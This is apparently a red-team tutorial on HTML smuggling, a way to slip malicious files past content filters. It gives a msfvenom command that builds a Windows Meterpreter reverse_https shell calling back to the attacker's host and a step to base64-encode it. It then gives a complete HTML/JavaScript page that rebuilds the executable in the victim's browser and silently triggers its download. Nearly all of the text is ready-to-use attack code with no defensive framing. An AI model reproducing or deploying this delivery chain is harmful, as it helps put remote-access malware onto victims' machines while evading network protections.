Using a combination of HTML5 and JavaScript to sneak malicious files past content filters is not a new offensive technique. This mechanism has been incorporated into popular offensive frameworks such as Demiguise and SharpShooter for example.
HTML smuggling is a file delivery technique that leverages HTML5 and JavaScript to build a file directly in the browser — rather than downloading it from a remote server — and then triggers a download, often without triggering network-based antivirus or proxy protections.
Generate a payload with msfvenom:
1
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<your_ip> LPORT=443 -f exe -o payload.exe
Convert to Base64:
1
base64 payload.exe | tr -d '\n'
Then stick your payload to this Javascript/HTML page:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<html>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array(len);
for (var i = 0; i < len; i++) {
bytes[i] = binary_string.charCodeAt(i);
}
return bytes.buffer;
}
// === Base64 payload here (one-line string) ===
var file = '<BASE64_PAYLOAD>';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], { type: 'application/octet-stream' });
var fileName = 'msfstaged.exe';
// === Cross-browser download logic ===
if (window.navigator && window.navigator.msSaveOrOpenBlob) {
// For Internet Explorer and older Edge
window.navigator.msSaveOrOpenBlob(blob, fileName);
} else {
// For modern browsers (Chrome, Firefox, new Edge)
var a = document.createElement('a');
var url = window.URL.createObjectURL(blob);
a.style = 'display: none';
a.href = url;
a.download = fileName;
document.body.appendChild(a);
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>